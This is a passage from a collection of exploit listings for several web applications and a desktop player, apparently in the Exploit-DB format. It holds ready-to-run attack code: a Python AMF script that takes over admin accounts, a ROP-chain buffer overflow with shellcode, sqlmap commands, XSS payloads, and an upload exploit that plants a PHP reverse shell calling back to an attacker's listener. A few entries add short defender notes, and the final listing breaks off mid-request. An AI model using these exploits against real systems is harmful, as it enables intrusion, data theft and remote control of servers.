  9. # Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated) # Date: 2020-08-24 # Software Link: https://wordpress.org/plugins/autoptimize/ # Author : SunCSR Team # Version: v2.7.6 # Tested on Ubuntu 18.04 / Kali Linux # Reference: https://wpvulndb.com/vulnerabilities/10372 Description : ------------------------------------------------------------------- The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE. [POC] Step 1 : POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: pwnme User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------26086940735210916964189813544 Content-Length: 685 Origin: http://pwnme Connection: close Cookie: autoptimize_feed=1; wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602; wp-settings-time-1=1598516614 -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/zip <?php Shell Content Here ! 
?> -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="action" ao_ccss_import -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="ao_ccss_import_nonce" f25ca64f22 -----------------------------404272946439029073744006559647-- [Response] HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Thu, 27 Aug 2020 08:21:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Access-Control-Allow-Origin: http://pwnme.me Access-Control-Allow-Credentials: true X-Robots-Tag: noindex X-Content-Type-Options: nosniff Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Length: 53 {"code":"200","msg":"Settings imported successfully"} Step 2: Access to http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php Recommendations: Update to version 2.7.7 Thank you very much!
  10. # Title: Online Shopping Alphaware 1.0 - 'id' SQL Injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-28 # Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description: The "id" parameter of "/alphaware/details.php?id=431860" is vulnerable to error-based blind SQL injection, which allows all databases to be retrieved. #POC sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
  11. # Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation # Date: 2020-08-28 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: 3.8.0 # Tested on: Windows # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover # # # Vendor: EIBIZ Co.,Ltd. # Product web page: http://www.eibiz.co.th # Affected version: <=3.8.0 # # Summary: EIBIZ develops an advertising platform for out-of-home media, which at the # time was called "Digital Signage". Because most business customers # still need to go outside to get in touch with products and services, online # media alone cannot serve them at the right place and the right time. # # Desc: The application suffers from an unauthenticated remote privilege escalation # and account takeover vulnerability that can be triggered by directly calling the # updateUser object (part of ActionScript object graphs), effectively elevating to # an administrative role or taking over an existing account by modifying its settings. 
#
# Tested on: Windows Server 2016
#            Windows Server 2012 R2
#            Windows Server 2008 R2
#            Apache Flex
#            Apache Tomcat/6.0.14
#            Apache-Coyote/1.1
#            BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5584
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5584.php
#
#
# 26.07.2020
#
#

import requests
import sys
import re


class Escalada:
    """Proof-of-concept client for the unauthenticated ``updateUser`` call.

    The object builds one serialized AMF RemotingMessage from the command-line
    arguments and POSTs it to ``/messagebroker/amf``.  Nothing here logs in
    first, which is the finding: the server dispatches the
    ``userService.updateUser`` operation without a valid session.

    Defender notes:
      * Network indicator: a POST to ``/messagebroker/amf`` with
        ``Content-Type: application/x-amf``, User-Agent ``DigitalSigner/25.1``,
        Referer ``<host>/main.swf`` and a fixed 32-character JSESSIONID from a
        client that never authenticated.
      * Server-side mitigation: require an authenticated, authorised session
        before ``userService.updateUser`` runs, and reject role changes that
        the caller's own role does not permit.
    """

    def __init__(self):
        # Fixed session id sent as JSESSIONID in amf(); not tied to any login.
        self.session = "11111111112222222222333333333344"
        self.agent = "DigitalSigner/25.1"
        self.display = "Intruder Alert"
        self.ep = "/messagebroker/amf"
        self.suprole = "Designer"
        self.serialize = None  # AMF request body, built in amf()
        self.address = None
        self.usrname = None
        self.passwrd = None
        self.headers = None

    def usage(self):
        """Read target, username, password, display name and optional role from argv.

        Exits with status 21 when fewer than four positional arguments are
        present.  A bare host is prefixed with ``http://``.
        """
        if len(sys.argv) < 5:
            print("i-Media Server Digital Signage 3.8.0 Privilege Escalation")
            print("Usage: ./poc.py [ip] [username] [password] [displayname] [role]")
            print("Example: ./poc.py 192.168.1.1 testingus 111111 Backdoor Administrator")
            exit(21)
        else:
            self.address = sys.argv[1]
            self.usrname = sys.argv[2]
            self.passwrd = sys.argv[3]
            self.display = sys.argv[4]
            # Role defaults to Administrator when no fifth argument is given.
            # The original listing names Administrator, Designer, Reporter and
            # Approver as the roles it knows about.
            self.suprole = (bytes("Administrator".encode("utf-8")) if len(sys.argv) < 6 else sys.argv[5])
            if not "http" in self.address:
                self.address = "http://{}".format(self.address)

    def amf(self):
        """Build the serialized AMF message and POST it to the endpoint.

        The request is sent once; if the server answers with
        "Detected duplicate HTTP-based FlexSessions" it is sent a second time
        and the reply is checked for "AcknowledgeMessage".
        """
        self.cookies = {"JSESSIONID" : self.session} # not really needed
        self.headers = {"User-Agent" : self.agent,
                        "Accept" : "*/*",
                        "Accept-Language" : "en-US,en;q=0.5",
                        "Accept-Encoding" : "gzip, deflate",
                        "Origin" : self.address,
                        "Connection" : "close",
                        "Referer" : self.address + "/main.swf",
                        "Content-Type" : "application/x-amf"}

        # Hand-assembled AMF3 RemotingMessage.  Hex-decoded, the literal bytes
        # below spell out, among other things,
        # "flex.messaging.messages.RemotingMessage", the operation
        # "updateUser", the body class "ds.model.User" with its field names
        # (password, create, tel, fax, name, address, update, id, mobile,
        # uDelete, department, role, read, email, company) and the
        # destination "userService".
        self.serialize = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E\x75\x6C\x6C"
        self.serialize += b"\x00\x03\x2F\x35\x38\x00\x00\x01\xFE\x0A\x00\x00"
        self.serialize += b"\x00\x01\x11\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
        self.serialize += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67\x2E\x6D\x65"
        self.serialize += b"\x73\x73\x61\x67\x65\x73\x2E\x52\x65\x6D\x6F\x74"
        self.serialize += b"\x69\x6E\x67\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
        self.serialize += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65\x72\x61\x74"
        self.serialize += b"\x69\x6F\x6E\x13\x6D\x65\x73\x73\x61\x67\x65\x49"
        self.serialize += b"\x64\x13\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x09"
        self.serialize += b"\x62\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E\x74\x49"
        self.serialize += b"\x64\x17\x64\x65\x73\x74\x69\x6E\x61\x74\x69\x6F"
        self.serialize += b"\x6E\x15\x74\x69\x6D\x65\x54\x6F\x4C\x69\x76\x65"
        self.serialize += b"\x0F\x68\x65\x61\x64\x65\x72\x73\x01\x06\x15\x75"
        self.serialize += b"\x70\x64\x61\x74\x65\x55\x73\x65\x72\x06\x49\x31"
        self.serialize += b"\x42\x38\x39\x37\x41\x38\x36\x2D\x37\x33\x42\x45"
        self.serialize += b"\x2D\x30\x35\x42\x31\x2D\x43\x45\x42\x33\x2D\x41"
        self.serialize += b"\x30\x35\x35\x30\x39\x36\x34\x31\x31\x34\x34\x04"
        self.serialize += b"\x00\x09\x05\x01\x0A\x81\x73\x1B\x64\x73\x2E\x6D"
        self.serialize += b"\x6F\x64\x65\x6C\x2E\x55\x73\x65\x72\x11\x70\x61"
        self.serialize += b"\x73\x73\x77\x6F\x72\x64\x0D\x63\x72\x65\x61\x74"
        self.serialize += b"\x65\x07\x74\x65\x6C\x07\x66\x61\x78\x09\x6E\x61"
        self.serialize += b"\x6D\x65\x0F\x61\x64\x64\x72\x65\x73\x73\x0D\x75"
        self.serialize += b"\x70\x64\x61\x74\x65\x05\x69\x64\x0D\x6D\x6F\x62"
        self.serialize += b"\x69\x6C\x65\x0F\x75\x44\x65\x6C\x65\x74\x65\x15"
        self.serialize += b"\x64\x65\x70\x61\x72\x74\x6D\x65\x6E\x74\x09\x72"
        self.serialize += b"\x6F\x6C\x65\x09\x72\x65\x61\x64\x0B\x65\x6D\x61"
        self.serialize += b"\x69\x6C\x0F\x63\x6F\x6D\x70\x61\x6E\x79\x06"

        # Each user-supplied string is prefixed with len*2+1, which appears
        # to be the AMF3 U29 string-length header for short strings.
        # password
        self.bytecount = len(self.passwrd * 2) + 1
        self.bytesdata = [self.bytecount]
        self.serialize += "".join(map(chr, self.bytesdata))
        self.serialize += (bytes(self.passwrd.encode("utf-8")))

        self.serialize += b"\x03\x06\x19\x31\x31\x31\x2D\x32\x32\x32\x2D\x33"
        self.serialize += b"\x33\x33\x33\x06\x19\x33\x33\x33\x2D\x32\x32\x32"
        self.serialize += b"\x2D\x31\x31\x31\x31\x06"

        # display name
        self.bytecount = len(self.display * 2) + 1
        self.bytesdata = [self.bytecount]
        self.serialize += "".join(map(chr, self.bytesdata))
        self.serialize += (bytes(self.display.encode("utf-8")))

        self.serialize += b"\x06\x1F\x49\x6D\x61\x67\x69\x6E\x61\x72\x79\x53"
        self.serialize += b"\x74\x72\x65\x65\x74\x03\x06"

        # username (the account being updated)
        self.bytecount = len(self.usrname * 2) + 1
        self.bytesdata = [self.bytecount]
        self.serialize += "".join(map(chr, self.bytesdata))
        self.serialize += (bytes(self.usrname.encode("utf-8")))

        self.serialize += b"\x06\x01\x03\x06\x11\x53\x65\x63\x75\x72\x69\x74"
        self.serialize += b"\x79\x06"

        # role
        self.bytecount = len(self.suprole * 2) + 1
        self.bytesdata = [self.bytecount]
        self.serialize += "".join(map(chr, self.bytesdata))
        self.serialize += (bytes(self.suprole.encode("utf-8")))

        # Trailer: e-mail/company values, the "userService" destination and
        # DSId / DSEndpoint ("my-amf") headers.
        self.serialize += b"\x03\x06\x15\x7A\x73\x6C\x40\x77\x68\x61\x2E\x62"
        self.serialize += b"\x61\x06\x07\x5A\x53\x4C\x06\x42\x01\x06\x17\x75"
        self.serialize += b"\x73\x65\x72\x53\x65\x72\x76\x69\x63\x65\x04\x00"
        self.serialize += b"\x0A\x0B\x01\x09\x44\x53\x49\x64\x06\x49\x34\x41"
        self.serialize += b"\x35\x46\x33\x33\x43\x33\x2D\x37\x31\x31\x46\x2D"
        self.serialize += b"\x35\x38\x45\x38\x2D\x39\x30\x35\x30\x2D\x39\x35"
        self.serialize += b"\x44\x31\x30\x30\x46\x33\x44\x45\x33\x45\x15\x44"
        self.serialize += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74\x06\x0D\x6D"
        self.serialize += b"\x79\x2D\x61\x6D\x66\x01"

        print("First try...")
        req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
        #print(req.text.encode("utf-8"))
        # BlazeDS rejects the first request when it sees a session it does
        # not know; the listing simply resends the same body.
        if "Detected duplicate HTTP-based FlexSessions" in req.text:
            print("Second try...")
            req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
            #print(req.text.encode("utf-8"))
            # An AcknowledgeMessage in the reply is taken as success.
            if "AcknowledgeMessage" in req.text:
                print("You are " + self.suprole + " now!")
            else:
                print("Didn't work.")
                exit(0)
        else:
            print("Try again!")

    def main(self):
        """Parse arguments, then send the request."""
        self.usage()
        self.amf()


if __name__ == '__main__':
    Escalada().main()
  12. # Title: Online Book Store 1.0 - 'id' SQL Injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-21 # Vendor Homepage: https://www.sourcecodester.com/php/14383/online-book-store.html # Software Link: https://www.sourcecodester.com/download-code?nid=14383&title=Online+Book+Store # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description: The "id" parameter of "/online%20book%20store/detail.php?id=44" is vulnerable to union-based blind SQL injection, which allows all databases to be retrieved. #POC sqlmap -u "http://TARGET/online%20book%20store/detail.php?id=44" -p id --dbms=mysql --threads=10 --technique=U --dbs
  13. ## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic

# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text 'emalp'

## Change shellcode according to your needs
## Shellcode max size is around 700 bytes.
# bad chars:
# \x00, \x0a, \x0b, \x1a

# Defender note: the crash is triggered by an over-long entry in a .plf
# playlist file; the product-side fix is to bound-check entry length in the
# playlist parser.  The payload in this listing only shows a message box.

import struct

bfile = open('bfile.plf','w')

# Filler up to the SEH record, then the SEH handler overwrite.
buf = 'A'*84
buf += struct.pack('<L', 0x60325143) # add esp, 0c; ret
buf += 'AAAA' # ret 04 ting from sehandler
buf += 'AAAA'*3 # bypassing 12 bytes i.e 0c
buf += struct.pack('<L', 0x6402091b) # add esp, 200; ret
buf += 'A'*500
buf += 'BBBB' # nseh
buf += struct.pack('<L', 0x640205b1) #sehandler; add esp, 4a0; ret 0x04
#---------------------------------------------------------------------
# this way we have a lot more space for shellcode.
buf += 'AAAA' # esp lands here.

#setting up the dynamic pointer for virtual protect
buf += struct.pack('<L', 0x61640e32) # pop eax; retn.
buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32
buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c
buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax]
# now eax has the kernel32.dll pointer
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04
buf += struct.pack('<L', 0x61640e32) # pop eax ret
buf += 'XXXX' # ret 4 padding
buf += struct.pack('<L', 0xffff675d) # neg to 98a3
buf += struct.pack('<L', 0x603267d4) # neg eax; ret
# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret
buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret
buf += 'XXXX' # pop esi padding
buf += struct.pack('<L', 0x641045f4) # sub eax,ecx
# now eax has the pointer to VirtualProtect
#------------------------------------------------------------------------
# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM

# SETTING ESI
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4

# SETTING EBP
buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret
buf += 'XXXX' # prev ret 4 padding
buf += struct.pack('<L', 0x60349b63) # jmp esp

# SETTING EBX
buf += struct.pack('<L', 0x61629938) # pop eax; ret
buf += struct.pack('<L', 0xfffffdff) # neg to 0x201
buf += struct.pack('<L', 0x6033b16b) # neg eax; ret
buf += struct.pack('<L', 0x61640124) # xchg eax,ebx

# SETTING EDX
buf += struct.pack('<L', 0x616310e8) # pop eax; ret
buf += struct.pack('<L', 0xffffffc0) # neg of 0x40
buf += struct.pack('<L', 0x6033b16b) # neg eax; retn
buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx

# SETTING ECX
buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret
buf += struct.pack('<L', 0x1001524e) # writable location

# SETTING EDI
buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret
buf += struct.pack('<L', 0x6162e802) # retn (rop nop)

# SETTING EAX
buf += struct.pack('<L', 0x6162d638) # pop eax; retn
buf += struct.pack('<L', 0x90909090) # nop

# FINALLY PUSHAD
buf += struct.pack('<L', 0x6033cd4a) # push ad

buf += '\x90\x90\x90\x90'*4

# shellcode generated using:
# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp"
# -b '\x00\x0a\x0b\x1a'
buf += (
"\xbb\x42\xa8\xb5\x43\xda\xc7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x41\x83\xc2\x04\x31\x5a\x0f\x03\x5a\x4d\x4a\x40\x9a\xba\x11"
"\x72\x69\x18\xd2\xb4\x40\xd2\x6d\x86\xad\x76\x19\x99\x1d\xfd"
"\x6b\x56\xd5\x77\x88\xed\xaf\x7f\x3b\x8f\x0f\xf4\x0d\x48\x1f"
"\x12\x07\x5b\xc6\x23\x36\x64\x18\x43\x33\xf7\xff\xa7\xc8\x4d"
"\x3c\x2c\x9a\x65\x44\x33\xc9\xfd\xfe\x2b\x86\x58\xdf\x4a\x73"
"\xbf\x2b\x05\x08\x74\xdf\x94\xe0\x44\x20\xa7\x3c\x5a\x72\x43"
"\x7c\xd7\x8c\x8a\xb2\x15\x92\xcb\xa6\xd2\xaf\xaf\x1c\x33\xa5"
"\xae\xd6\x19\x61\x31\x02\xfb\xe2\x3d\x9f\x8f\xaf\x21\x1e\x7b"
"\xc4\x5d\xab\x7a\x33\xd4\xef\x58\xdf\x87\x2c\x12\xd7\x6e\x67"
"\xda\x0d\xf9\x45\xb5\x43\xb7\x47\xaa\x0e\xaf\xc7\xcd\x50\xd0"
"\x71\x74\xab\x95\xfc\xaf\x51\x9a\x87\x4c\xb2\x0e\x60\xe2\x45"
"\x51\x8f\x72\xfc\xa5\x18\xe9\x93\x95\x99\x99\x58\xe7\x37\x3e"
"\xf7\x72\x3b\xdb\x75\x4c\x60\xab\x26\x88\x9c\x25\x30\x86\x5f"
"\x60\xb9\xaf\x62\xdb\x7a\x07\xc0\x91\xc0\xd0\x19\x0e\x6b\x36"
"\x7e\xb1\x74\x39\xe9\x22\xf3\x9d\xca\xd4\x62\x7a\x6e\x67\x0d"
"\xc9\x15\x14\xbe\xe0\x0e\x52\x1c\x26\xbb\xea\x7e\x4e\xcb\xb4"
"\xa0\xae\x43\x20\xcc\xcf\xff\x9b\xc7\x87\x4c\xf8\xd2\x1e\xad"
"\x31\x0f\x72\x7d\x63\xfd\x8d\x51\xb2\xc1\x21\xad\xe0\xc9"
)
buf += '\x90\x90\x90\x90'*5
buf += 'E'*200

bfile.write(buf)
bfile.close()
  14. # Exploit Title: Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) # Date: 2020-08-19 # Exploit Author: c0mpu7er(@ymbank.cn) # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.8.zip # Version: 1.4.7 # Tested on: PHP 5.4.45, Apache 2.4.23 ,mysql 5.0 1. Description: ---------------------- FUEL CMS 1.4.8 allows SQL Injection via parameter 'fuel_replace_id' in pages/replace/1 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from one of the affected pages with 'fuel_replace_id' parameter and save it like 33.txt Then run SQLmap to extract the data from the database: python sqlmap.py -r 33.txt --dbs 3.Example payload: Content-Disposition: form-data; name="fuel_replace_id" 11%27 4. Burpsuite request payload: ---------------------- POST /FUEL-CMS-1.4.8/fuel/pages/replace/1?inline=1 HTTP/1.1 Host: 192.168.1.12 Content-Length: 347 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.12 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygI1zKZoBINTcL87g User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.12/FUEL-CMS-1.4.8/fuel/pages/replace/1?lang=english Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: fuel_ac82b68172fd46789948eb8e66216180=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A0%3A%22%22%3B%7D; 
fuel_ui_ac82b68172fd46789948eb8e66216180=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_create%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25220%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%257D; ci_session=db8df72tccrt8vnr2uaqnckv5ak4n135 Connection: close ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="fuel_replace_id" 11* ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="Submit" Submit ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="fuel_inline" 1 ------WebKitFormBoundarygI1zKZoBINTcL87g-- 5. Timeline: ---------------------- 2020-08-20: SQLi vulnerability found in Fuel CMS 1.4.8 2020-08-20: Reported vulnerability to vendor 2020-08-22: Vendor has patched the SQLi vulnerability in version 1.4.9
  15. # Exploit Title: Mara CMS 7.5 - Reflective Cross-Site Scripting # Google Dork: NA # Date: 2020-08-01 # Exploit Author: George Tsimpidas # Vendor Homepage: https://sourceforge.net/projects/maracms/ # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # Version: 7.5 # Tested on: Kali Linux(x64) # CVE : CVE-2020-24223 Mara CMS 7.5 suffers from a Reflected Cross-Site Scripting vulnerability. Description : This Reflected XSS vulnerability allows any authenticated user to inject malicious code via the parameter contact.php?theme=<inject>. The vulnerability exists because the parameter is not properly sanitized, so injected code is reflected and executed in the target's browser. PoC : Use Payload : seven69387';alert(1)//154 Path : http://localhost/contact.php?theme=< inject payload here> Injection Example : http://localhost/contact.php?theme=seven69387';alert(1)//154
  16. #!/usr/bin/python3
#-*- coding: utf-8 -*-
# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
# Google Dork: N/A
# Date: 2020-08-31
# Exploit Author: Luis Noriega (@nogagmx)
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04.4 LTS
# CVE : N/A

# Usage:
# python3 exploit.py --url http://URL/cmsms/admin/login.php -u admin -p password -lhost LHOST -lport LPORT

# Defender notes: the script logs in as an existing admin, then posts a file
# with a ".phar" name to the FileManager module's upload action
# (mact=FileManager,m1_,upload,0) and requests the returned URL.  The
# product-side fix is a server-side allow-list of upload extensions that
# excludes PHP-executable ones, plus serving the upload directory without
# script execution.  Indicator: an admin-session POST to moduleinterface.php
# carrying a multipart file whose name ends in .phar.

from urllib.parse import urlparse
import requests
import argparse
import string
import random
import json
import sys


def parse_url(URL):
    """Return the moduleinterface.php URL that sits next to the given login.php URL.

    Everything in the path before 'login.php' is kept; the query string is dropped.
    """
    t = urlparse(URL)
    return t.scheme+'://'+t.netloc+t.path.split('login.php')[0] + 'moduleinterface.php'


parser = argparse.ArgumentParser(description='CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell')
parser.add_argument('--url', dest='URL', help='URL to admin pane </admin/login.php>', required=True)
parser.add_argument('-u', dest='USERNAME', help='Username', required=True)
parser.add_argument('-p', dest='PASSWORD', help='Password', required=True)
parser.add_argument('-lhost', dest='IP', help='The listen address', required=True)
parser.add_argument('-lport', dest='PORT', help='The listen port', required=True)
args = parser.parse_args()

login_data = {'username':"", "password":"", "loginsubmit": "Submit"}

# PHP reverse-shell source; the two %s are filled with the listener host/port.
PAYLOAD = '<?php set_time_limit (0); $VERSION = "1.0"; $ip = "%s"; $port = "%s"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>'% (args.IP,args.PORT)

# Random 5-character name with a .phar extension (the extension the file
# manager accepts but PHP will execute).
FILENAME = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.phar'
file = {'m1_files[]': (FILENAME, PAYLOAD)}
# "__c" is filled from the session cookie after login.
upload_data = {"mact":"FileManager,m1_,upload,0", "__c":"", "disable_buffer":"1"}
URL_UPLOAD = parse_url(args.URL)

print("[ + ] Connection to the CMS Made Simple Admin Portal located at "+ args.URL)
print("[ + ] Using "+ args.USERNAME +":"+ args.PASSWORD);
login_data['username'] = args.USERNAME; login_data['password'] = args.PASSWORD

try:
    session = requests.session()
    req = session.post(args.URL, data=login_data)
    upload_data["__c"] = session.cookies["__c"]
    print ("[ + ] %s logged successfully!"%(args.USERNAME))
    response = requests.post(URL_UPLOAD, files=file, cookies=session.cookies,data=upload_data)
    data = response.json()
    print ("[ + ] %s file uploaded."%(FILENAME))
    # The upload response JSON carries the URL of the stored file.
    URL_TRIGGER = data[0]['url']
    input("[ ! ] Set up your nc listener <nc -nvlp %s>, then press any to exploit.."%(args.PORT))
    print ("[ + ] Pwned!!")
    response = requests.get(URL_TRIGGER, cookies=session.cookies)
    print ("[ + ] Bye")
except:
    # NOTE(review): a bare except hides the real failure (login, upload or
    # JSON decoding); the message below is printed for any of them.
    print ("[ x ] Something went wrong, try again.")
    sys.exit(1)
  17. # Exploit Title: moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated) # Date: 2020-08-31 # Exploit Author: Abdulkadir Kaya # Vendor Homepage: https://www.mozilo.de/ # Version: 2.0 # Tested on: Windows & WampServer 1- Go to the following URL. >> http://(HOST)/(PATH)/admin/ 2- Log in to the admin panel. 3- Go to "Content". 4- Write the XSS payload in the "Content Page" section. 5- Save. NOTE: the Content Page must be inside a Category. ((XSS Payloads)) 1-<script>alert("XSS Confirmed");</script> 2-<script>alert(document.cookie);</script> 3-<script>alert(document.domain);</script> (( REQUEST )) POST /mozilo/admin/index.php HTTP/1.1 Host: 127.0.0.1:8088 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:8088/mozilo/admin/index.php?nojs=true&action=catpage&multi=true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 269 Origin: http://127.0.0.1:8088 Connection: close Cookie: mozilo_editor_settings=true,false,mozilo,12px; 